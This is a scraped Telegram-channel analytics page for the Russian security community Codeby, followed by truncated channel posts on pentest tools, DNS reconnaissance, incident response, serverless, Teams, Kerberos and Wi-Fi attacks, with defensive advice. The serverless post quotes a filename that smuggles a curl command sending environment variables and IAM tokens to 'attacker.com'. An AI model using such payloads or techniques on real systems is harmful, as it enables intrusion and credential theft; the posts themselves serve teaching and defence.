Codeby
Блог сообщества Кодебай Чат: @codeby_one Форум: codeby.net Обучение: codeby.academy CTF: hackerlab.pro VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Реклама: @Savchenkova_Valentina
Mostrar más📈 Análisis del canal de Telegram Codeby
El canal Codeby (@codeby_sec) en el segmento lingüístico de Ruso es un actor destacado. Actualmente la comunidad reúne a 36 579 suscriptores, ocupando la posición 3 750 en la categoría Tecnologías y Aplicaciones y el puesto 17 801 en la región Rusia.
📊 Métricas de audiencia y dinámica
Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 36 579 suscriptores.
Según los últimos datos del 09 junio, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 199, y en las últimas 24 horas de 2, conservando un alto alcance.
- Estado de verificación: No verificado
- Tasa de interacción (ER): El promedio de interacción de la audiencia es 7.71%. Durante las primeras 24 horas tras publicar, el contenido suele obtener 4.19% de reacciones respecto al total de suscriptores.
- Alcance de las publicaciones: Cada publicación recibe en promedio 2 819 visualizaciones. En el primer día suele acumular 1 534 visualizaciones.
- Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 19.
- Intereses temáticos: El contenido se centra en temas clave como edr, api, вектор, mitre, att&ck.
📝 Descripción y política de contenido
El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“Блог сообщества Кодебай
Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy
CTF: hackerlab.pro
VK: vk.com/codeby
YT: clck.ru/XG99c
Сотрудничество: @KinWiz
Реклама: @Savchenkova_Valentina”
Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 10 junio, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.
Инструмент, предоставляющий возможность простого и безопасного способа отправки файлов с одного компьютера на другой.Инструмент позволяет выполнять следующие функции: ▶️Позволяет любым двум компьютерам передавать данные (через ретрансляционный сервер); ▶️Обеспечивает сквозное шифрование (с использованием PAKE); ▶️Облегчает кроссплатформенную передачу (Windows, Linux, Mac); ▶️Поддерживает передачу множества файлов; ▶️Позволяет возобновлять прерванные передачи; ▶️Не требует локального сервера или проброса портов; ▶️Приоритет IPv6 с резервным использованием IPv4; ▶️Может использовать прокси, например Tor. ⬇️Установить можно в одну команду через Docker.
croc() { [ $# -eq 0 ] && set -- ""; mkdir -p "$HOME/.config/croc"; docker run --rm -it --user "$(id -u):$(id -g)" -v "$(pwd):/c" -v "$HOME/.config/croc:/.config/croc" -w /c -e CROC_SECRET docker.io/schollz/croc "$@"; }
Использование
0️⃣ Чтобы отправить файл необходимо после команды send указать до него путь и ввести кодовую фразу.
Для получения файла просто необходимо ввести ту же кодовую фразу.
Кодовая фраза используется для установления соглашения о ключах с аутентификацией по паролю, в рамках которого генерируется секретный ключ для отправителя и получателя, используемый для сквозного шифрования.
1️⃣ В Linux и macOS процесс отправки и получения данных немного отличается. Чтобы избежать утечки секретных данных через имя процесса необходимо запустить croc с секретными данными в качестве переменной среды. Например, чтобы получить файл с секретом ***:
CROC_SECRET=*** croc2️⃣ Отправка нескольких файлов
croc send [file1] [file2] [file3] [folder1] [folder2]3️⃣ Отправка текста
croc send --text "hello world"4️⃣ Изменение алгоритма хэширования на imohash
croc send --hash imohash SOMEFILE
#security #tools #share
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджеромdig axfr на вторичный NS — и получаете 340+ DNS-записей за четыре минуты. Имена хостов вроде dc01-prod, jenkins-build, vault-backup — готовая карта инфраструктуры. От этого дампа до domain admin — три дня. Реальный кейс, реальная пропорция.
DNS — протокол, который все считают скучным. А он работает поверх UDP без шифрования и без аутентификации ответов. Из этого растут почти все атаки.
🔎 Пассивная разведка — начинай с неё, чтобы не светиться в логах цели. Certificate Transparency Logs через crt.sh отдают субдомены, для которых выпускались SSL-сертификаты. Passive DNS базы вроде SecurityTrails хранят историю резолвов — субдомен, который больше не резолвится, но когда-то указывал на IP, может стать вектором subdomain takeover. subfinder от ProjectDiscovery автоматизирует сбор из десятков источников одной командой.
➡️ Zone transfer — первое, что проверяется на engagement. Важный нюанс: проверяй каждый NS отдельно. Первичный может быть закрыт, а вторичный — legacy-BIND с дефолтной конфигурацией, где AXFR разрешён для любого IP. На практике именно вторичные NS чаще оказываются misconfigured — их просто забывают.
➡️Когда zone transfer закрыт, переходи к словарному перебору субдоменов. dnsenum и dnsrecon комбинируют попытку AXFR с брутфорсом по словарю и reverse lookup. Для bug bounty с широким скоупом лучше связка amass + subfinder + dnsx с дедупликацией.
🎇Отдельная история — внутренний пентест и Active Directory. SRV-записи для Kerberos и LDAP выдают контроллеры домена напрямую: dig -t SRV _ldap._tcp.dc._msdcs.domain.com. Эти записи нужны самому AD для работы — удалить их нельзя. По сути, DNS в AD — встроенный инструмент разведки для атакующего.
Но разведка — только начало. Cache poisoning строится на том, что Transaction ID в DNS — всего 16 бит. Угадай его и отправь поддельный ответ быстрее настоящего сервера — резолвер примет фальшивые данные. DNS rebinding позволяет обходить same-origin policy браузера, а DNS туннелирование — выносить данные из сетей, где заблокировано всё, кроме DNS.
В полной статье — разбор каждой техники с командами, ограничениями, привязкой к MITRE ATT&CK и decision tree по выбору инструментов. Читай на форуме Codeby ⬇️
https://codeby.net/threads/dns-pentest-ot-razvedki-i-zone-transfer-do-cache-poisoning-rebinding-i-tunnelirovaniya.93673/YYYY-MM-DD HH:MM:SS UTC. Если источник пишет в локальной зоне — конвертируй явно с указанием исходной.
2. Гранулярность зависит от фазы. Initial access и lateral movement — секунды. Восстановление — часы.
3. Каждая строка привязана к артефакту: лог SIEM, дамп памяти, pcap, скриншот EDR. Запись без источника — голословное утверждение, которое страховая просто вычеркнет.
Отдельная боль — IOC-приложения. Хэши, домены, IP-адреса без контекста и категоризации бесполезны. Как правильно оформить IOC-лист, выстроить timeline и собрать отчёт, который выдержит проверку аудитом и страховой — разобрали в полной версии статьи.
https://codeby.net/threads/ir-otchet-po-intsidentu-struktura-timeline-i-ioc-prilozheniya-dlya-biznesa-i-tekhkomandy.93675/JADX — инструмент для преобразования Android-файлов (APK, DEX, AAR, AAB) в читаемый Java-код. Разработанный на Java, он позволяет анализировать внутреннее устройство Android-приложений без доступа к исходному коду.👉Основные возможности ▶️Преобразование файлов APK, DEX, AAR, AAB, ZIP и Class в Java-код ▶️Извлечение и декодирование AndroidManifest.xml и других ресурсов из resources.arsc ▶️Встроенный механизм для восстановления читаемых имен классов, методов и полей ▶️Поддержка отладки на уровне smali-кода (требует дополнительной настройки) ⬇️Установка
sudo apt install jadx
Проверка
jadx -h
⏺️Декомпиляция APK-файла в директорию out
jadx -d out app.apk
⏺️Анализ безопасности приложения
jadx -d decompiled --deobf --show-bad-code suspicious.apk
⏺️Быстрый просмотр через GUI
jadx-gui app.apk
⏺️Обработка нескольких DEX-файлов
jadx -d out classes1.dex classes2.dex classes3.dex
🔎Инструмент незаменим для:
- Анализа вредоносного ПО
- Исследования работы проприетарных библиотек
- Восстановления утерянного исходного кода
- Обучения принципам работы Android-приложений
#jadx #android #decompiler #androidsecurity #pentest #tool
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджеромpowershell.exe или wmic, не триггерит стандартные правила корреляции. Он выглядит как легитимный администратор.
📊 Ещё одна цифра от IBM X-Force 2025: самый распространённый тип малвари сегодня — инфостилеры (32%), они обогнали шифровальщиков. А среднее время между публикацией CVE и устранением уязвимости в организации — 29 месяцев. Два с половиной года. Атакующим не нужны zero-day, когда окно открыто настолько широко.
⚙️ Расследование кибератаки — управляемый процесс с чёткими фазами. Два основных фреймворка — NIST SP 800-61 и SANS — описывают одну и ту же логику разными словами:
1. Подготовка — IR-план, playbook, инструменты наготове
2. Обнаружение и анализ — triage алерта, определение скоупа
3. Сдерживание — изоляция хоста, сегмента, учётки
4. Устранение и восстановление — очистка, пересоздание, возврат в продакшн
5. Разбор полётов — отчёт, timeline, IOC-приложения
Ключевое различие: NIST объединяет шаги 3-4, потому что на практике они идут параллельно. Вы изолируете один сегмент и тут же чистите соседний. SANS разбивает их последовательно, что удобнее для команд, которые строят процесс с нуля.
Но выбор фреймворка вторичен. Критично другое — сам факт наличия документированного плана. Без него каждый инцидент превращается в импровизацию, где теряются артефакты, затираются логи и уничтожаются доказательства.
🎯 Практический чеклист на первые 30 минут:
• Подтвердить алерт — это true positive?
• Определить скоуп — один хост или сегмент?
• Изолировать, не выключая — сохранить содержимое RAM
• Зафиксировать время — таймлайн начинается сейчас
Мы собрали полную карту Incident Response — от первого алерта до финального отчёта, с разбором форензики, анализа памяти, threat hunting и реальных кейсов. Все детали — в полной статье.
https://codeby.net/threads/rassledovaniye-kiberataki-polnaya-karta-incident-response-ot-obnaruzheniya-do-otcheta.93680/os.system(). Атакующий загружает файл с именем вроде ; curl attacker.com/exfil?d=$(env)#.csv — и переменные окружения с IAM-токенами утекают за одно исполнение. Одно. Миллисекунды. Причём WAF тут не спасёт: он защищает HTTP-уровень через API Gateway, но event injection через SQS или SNS идёт в обход — payload лезет через окно, пока WAF сторожит дверь.
• Privilege escalation через IAM-роли. Если у атакующего есть iam:PassRole и lambda:UpdateFunctionCode, он может подменить код существующей функции и привязать к ней роль с широкими правами. На пентесте 12 из 47 функций имели execution role с Action: "*" на S3 и DynamoDB. Это не edge-case, а типичная картина — разработчики назначают максимальные права «чтобы работало» и забывают ужать.
• Persistence через триггеры. Атакующий создаёт EventBridge-правило, которое вызывает вредоносную функцию при каждом создании IAM-пользователя или загрузке файла. Lambda как эфемерный C2-сервер: получает команды, передаёт на скомпрометированные хосты, завершается. Следов в файловой системе нет, потому что файловой системы нет.
📊 По данным Cloud Security Alliance, более 70% организаций до сих пор не имеют выделенных контролей для serverless-окружений. При этом рынок serverless-безопасности уже перевалил за 12 млрд долларов — деньги вкладываются, но зрелость detection отстаёт на годы.
🛡 Что проверить прямо сейчас:
1. Есть ли в ваших Lambda-функциях вызовы os.system() или subprocess с пользовательским вводом?
2. Execution roles — минимальные привилегии или wildcard?
3. Настроены ли алерты на UpdateFunctionCode и iam:PassRole в CloudTrail?
В полной статье — разбор конкретных цепочек атак с примерами кода, detection-правилами для SIEM и чек-листом для харденинга.
https://codeby.net/threads/ataki-na-serverless-funktsii-injection-event-poisoning-i-privilege-escalation.93670/https://codeby.net/account/security
3. Нажмите кнопку в блоке «🔐 Управление способами входа»
4. Откроется страница Codeby ID — раздел «Способы входа»
5. Нажмите «Привязать Telegram» — откроется виджет Telegram, подтвердите вход в Telegram
6. Готово ✅ — теперь Telegram привязан к вашему Codeby ID
Теперь зайдите на hackerlab.pro через «Войти через Telegram» — попадёте в свой существующий HackerLab-аккаунт со всем прогрессом (если у вас уже был аккаунт на HL под этим Telegram).
---
❓ Сценарий 3 — связать существующие аккаунты Форум + HackerLab
Связь происходит автоматически, если все способы входа привязаны к одному Codeby ID.
Проверка: зайдите на https://id.codeby.net/if/user/ → раздел «Способы входа» — здесь должны быть все ваши способы (Telegram, email, Google, GitHub — те что используете).
Если способа не хватает — привяжите по инструкциям из Сценария 1 или 2.
После того как все способы привязаны:
- Логин на форум по email/Google/GitHub → ваш форумный аккаунт
- Логин на HL по Telegram → ваш HL-аккаунт со всеми задачами
- Это один и тот же Codeby ID на обоих сайтах
---
⚠️ Чего НЕ нужно делать
- ❌ Не регистрируйтесь через разные email на разных сайтах — система воспримет это как разных людей
- ❌ Не используйте одноразовые email (mailinator, cock.lu и подобные) — они блокируются как спам, письмо подтверждения не дойдёт
- ❌ Если что-то пошло не так — не создавайте новый аккаунт повторно, напишите CTO (контакт ниже). Лишние аккаунты только усложнят восстановление
---
🆘 Куда писать о проблеме
Если:
- Видите пустой аккаунт вместо своего старого (нет ваших задач CTF / нет постов на форуме)
- Не получается привязать email или Telegram
- Письмо с подтверждением не приходит
- Кнопка «Войти через X» не работает или показывает ошибку
- Любая другая проблема со входом
Напишите мне в Telegram: [@The_Codeby] или на mail@codeby.email — приложите скриншот и опишите что делали и что увидели. Чем подробнее — тем быстрее починим.' ' протоколами при анализе сетевой инфраструктуры
⏺️AI in-the-loop — как генеративный AI в связке с привычными инструментами помогает находить новые уязвимости
Huge Impact - находки на внешних периметрах, которые приводили к максимальному ущербу за прошедший год:
▶️захват кассовых аппаратов
▶️снова Bitrix: RCE в кастомных доработках
▶️поиск иголки в стоге сена магистральных провайдеров
▶️«Большой брат»: захват систем видеонаблюдения
▶️секретный доклад
Также будут доклады от партнёров конференции: Сбербанк, Xello, Mitigator, Indeed.
Активности:
Lockpicking (физический взлом замков)
RFID и NFC-эксперименты
Соревновательный OSINT
Конкурс по обходу фильтров антифишинга
И отдельный бонус для тех, кто скучал по олдскулу: демосцена и ретро-компьютинг. ZX Spectrum, Commodore 64, Commodore Amiga, Микроша, Atari, лучшие intro/demo и турнир по DOOM II.
Когда: 22 мая 2026, 10:00
Где: Москва, Дворец Культур, ул. Шарикоподшипниковская, д. 15, стр. 1
Метро: Дубровка
Участие бесплатное, но регистрация обязательна!
🔗 ССЫЛКА НА РЕГИСТРАЦИЮnmap -sS — вы на L3–L4. Отправляете IP-пакеты с TCP-сегментами, манипулируете флагами SYN/ACK/RST. Получили SYN-ACK — порт открыт. RST — закрыт. Тишина — между вами firewall, который дропает пакет.
• Запускаете Responder для перехвата NTLM-хешей — работаете сразу на L2–L7. Подмена DNS/LLMNR-ответов на прикладном уровне опирается на широковещание канального.
• Эксплуатируете SQLi через Burp Suite — чистый L7. Один пентестер, три сценария, три набора ограничений.
⚡️ Отдельная история — TCP-рукопожатие. Три пакета: SYN, SYN-ACK, ACK. Казалось бы, элементарно. Но именно на этой механике построено всё сканирование портов. SYN-скан в Nmap отправляет SYN и не завершает рукопожатие — сразу шлёт RST после ответа сервера. Поэтому он быстрее и тише полного TCP-connect. Но требует root-привилегий для работы с raw-сокетами. Без root Nmap автоматически переключится на -sT, который завершает рукопожатие полностью и оставляет больше следов в логах.
🛡 И ещё момент, который часто упускают начинающие: понимание уровня атаки критически важно для отчёта. Нашли уязвимость на L2? Рекомендация — port security и Dynamic ARP Inspection на коммутаторах. На L7? WAF или исправление кода. Без указания уровня рекомендация «настройте защиту» бесполезна — всё равно что прийти к врачу и сказать «болит», не уточнив где.
📌 Четыре TCP-флага, которые стоит запомнить навсегда:
• SYN — начало соединения
• ACK — подтверждение
• RST — принудительный сброс
• FIN — корректное завершение
Этих четырёх хватит, чтобы читать 90% того, что происходит в Wireshark при сканировании.
В полной статье — подробный разбор стека TCP/IP, таблицы соответствия с OSI, конкретные команды Nmap и объяснение, почему пентестеры думают в терминах TCP/IP, а пишут в терминах OSI.
https://codeby.net/threads/osnovy-setei-dlya-pentestera-model-osi-tcp-ip-i-protokoly-kotoryye-nuzhno-znat.93035/microsoft.com/devicelogin, вводит код, проходит полную аутентификацию включая MFA — push, SMS, TOTP, даже FIDO2. Всё срабатывает штатно. Токен просто уходит на инфраструктуру злоумышленника.
Современные PhaaS-платформы превратили это в конвейер: фишинговые страницы генерируют device code динамически, AI-модули персонализируют приманки под конкретные рабочие процессы — тендеры, DocuSign, формы Microsoft. Жертва авторизуется на настоящем сайте Microsoft. Ничего подозрительного в процессе нет. MFA обходится by design, а не через уязвимость.
🎭 Вектор 2: Вишинг через Teams
Атакующий пишет сотрудникам через External Access, представляясь ИТ-поддержкой. Несколько человек отказываются, но один соглашается предоставить удалённый доступ через Quick Assist — встроенный инструмент Windows. Одного хватает.
Дальше — без участия жертвы: перенаправление на поддельную форму входа, загрузка MSI-пакета с вредоносной DLL, установка C2-канала, перемещение по сети через living-off-the-land. Вектор не масштабируется — один оператор на одну жертву — но одного успешного захода достаточно для полной компрометации.
🕸 Вектор 3: AiTM-прокси
Adversary-in-the-middle через прокси перехватывает сессионные токены в реальном времени. Типичная цепочка: email с PDF → ссылка на домен атакующего → прозрачное проксирование настоящей страницы логина Microsoft → перехват cookie и токена после успешной аутентификации. По оценкам исследователей, такие кампании затрагивают десятки тысяч пользователей в тысячах организаций.
📌 Что объединяет все три вектора?
Teams — не просто чат. Это OAuth-клиент с доступом к Microsoft Graph API, SharePoint и Entra ID. Компрометация через Teams даёт атакующему не пароль в открытом виде, а живой токен с правами пользователя внутри тенанта. Для SOC это выглядит как обычная работа сотрудника — пока не настроены правильные корреляции.
Что делать прямо сейчас? Заблокируйте device code flow через Conditional Access, ограничьте External Access в Teams, заблокируйте Quick Assist через GPO или Intune.
Полный разбор всех техник с маппингом на MITRE ATT&CK и конкретными мерами защиты — в статье на форуме.
https://codeby.net/threads/ataki-cherez-microsoft-teams-krazha-uchetnykh-dannykh-i-obkhod-mfa-tekhniki-i-zashchita.93034/Evilginx2 перехватывают сессионные cookie в реальном времени, пока жертва вводит свой одноразовый код. Push-усталость заставляет человека нажать «Подтвердить» в три часа ночи, лишь бы уведомления прекратились. SIM-свопинг вообще убирает телефон из уравнения.
⚡️ Цепочка атаки выглядит как лестница из четырёх ступеней:
1. Учётные данные — credential stuffing из утёкших баз, password spraying, покупка логов у инфостилеров. По Verizon DBIR 2025, 38% утечек начинаются именно так.
2. Обход MFA — AiTM-фишинг, перехват OTP, push-бомбинг.
3. Токены и билеты — OAuth-токены, Kerberos TGT/TGS, Primary Refresh Token в Azure AD. Всё это работает без пароля и без MFA. Pass-the-Ticket, Pass-the-Cookie, token replay — атакующий действует от имени легитимного пользователя.
4. Закрепление — Golden Ticket, долгоживущие refresh tokens, скомпрометированный Identity Provider. Сброс пароля жертвы на этом этапе уже ничего не даёт.
🎯 Отдельная боль — Kerberos. Протоколу больше 30 лет, но он по-прежнему ядро аутентификации Active Directory. Kerberoasting не требует привилегий Domain Admin. Любой доменный пользователь запрашивает сервисный билет, зашифрованный хэшем пароля сервисной учётки, и крекает его офлайн. KDC при этом видит абсолютно легитимный запрос. AS-REP Roasting ещё проще — для аккаунтов с отключённой преаутентификацией доменная учётка даже не нужна.
И ещё одна цифра, которая должна не давать спать спокойно: медианное время исправления утёкшего секрета на GitHub — 94 дня. Три месяца API-ключ или токен лежит в открытом доступе. Понятие «учётные данные» давно вышло за рамки логина и пароля — теперь это JWT, API-ключи, CI/CD-секреты, сервисные аккаунты облаков.
🛡 Что делать прямо сейчас? Проверьте AD на Kerberoastable-аккаунты и учётки без преаутентификации. Внедрите FIDO2 вместо SMS и push. Мониторьте аномальные запросы TGS-билетов. Это минимум, который закрывает самые массовые векторы.
В полной статье — детальная карта атак на identity с разбором каждой техники, инструментов и методов детекта.
https://codeby.net/threads/ataki-na-autentifikatsiyu-polnyi-razbor-tekhnik-komprometatsii-oauth-mfa-kerberos-i-identity-infrastruktury.93646/Company2024! — название компании, год, восклицательный знак. Hashcat со словарём rockyou и правилом best64 разобрался за считанные минуты. Итог: три этажа офиса, двести сотрудников, VLAN-сегментация — всё доступно с парковки через направленную антенну.
И это не единичный случай. Компании вкладывают миллионы в WAF, EDR, SIEM, а беспроводной вектор остаётся слепым пятном. Wi-Fi — один из самых недооценённых путей initial access в реальных пентестах.
🔑 Почему это работает так легко?
WPA2-PSK уязвим к офлайн-перебору. Атакующему достаточно перехватить PMKID (даже без подключённых клиентов!) или классический 4-way handshake после деаутентификации. Дальше — дело GPU. На RTX 3090 Hashcat выдаёт около 1 MH/s на WPA-PBKDF2, на RTX 4090 — до 1.8 MH/s. Словарь rockyou с мутациями (~1 млрд кандидатов) прогоняется за 10–15 минут. Восьмизначный цифровой пароль падает ещё быстрее.
Но есть нюанс: 12+ случайных символов со спецсимволами — вне досягаемости любого текущего железа. Разница между "взломали за 11 минут" и "не взломали вообще" — буквально в качестве пароля.
📡 А что с WPA3?
WPA3-SAE убирает офлайн-перебор — протокол Dragonfly не отдаёт хеш для брутфорса. Звучит надёжно. Но на практике большинство корпоративных сетей работают в Transition Mode (WPA2 + WPA3 одновременно), чтобы не ломать совместимость со старыми устройствами. А это значит — атакующий просто принудительно даунгрейдит клиента до WPA2 и работает по старой схеме. Transition Mode — это иллюзия безопасности, а не реальная защита.
⚙️ Ещё один мощный вектор — Evil Twin. Поднимаешь поддельную точку доступа с тем же SSID, деаутентифицируешь клиентов от настоящей — и они переподключаются к тебе. Для WPA2-Enterprise это вообще золотая жила: инструмент eaphammer поднимает фейковый RADIUS и собирает доменные учётки в открытом виде, если клиенты не валидируют сертификат сервера.
Что из этого следует? Беспроводной пентест — не экзотика, а обязательная часть аудита. И техники, и инструменты давно зрелые. В полном гайде — пошаговые команды, выбор адаптеров, разведка эфира и разбор каждого вектора с примерами.
https://codeby.net/threads/vzlom-wifi-ataki-na-wpa2-i-wpa3-prakticheskii-gaid-dlya-pentestera.93030/Роскомнадзор сообщил, что доступ к сервисам GitHub не блокирует.По данным OONI, в США, Великобритании и Германии таких проблем не наблюдается, проблема затрагивает только РФ. На днях депутат по информационной политике Горелкин написал в своём ТГК:
Процент неудачных соединений с платформой, которую многие отечественные программисты используют для совместной работы с кодом, превысил 16%. Интересно, что проблема коснулась только пользователей из РФ – и поскольку РКН сообщает, что не ограничивает работу GitHub, остается лишь один вариант: сознательная дискриминация российских пользователей администрацией платформы. Эта компания не просто ушла из России, но занимается откровенным вредительством (чего, например, стоит тенденциозное «исследование» уровня внедрения ИИ). Так что не нужно удивляться проблемам с доступом к GitHub с территории РФ – думаю, что количество неудачных соединений с 16% уже скоро достигнет всех 100%. Поэтому я бы рекомендовал нашим разработчикам срочно переносить свои проекты на другие Git-репозитории. Да, за многие годы (и задолго до прихода Microsoft) GitHub стал не просто отраслевым стандартом, а центральной точкой многих систем. Но от этой зависимости пора уходить – тем более есть хорошие отечественные аналоги.GitHub нет в реестре запрещённых сайтов Роскомнадзора, то есть официально сервис не заблокирован, однако запрещены более 130 страниц сервиса. #news #github #rkn #it 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
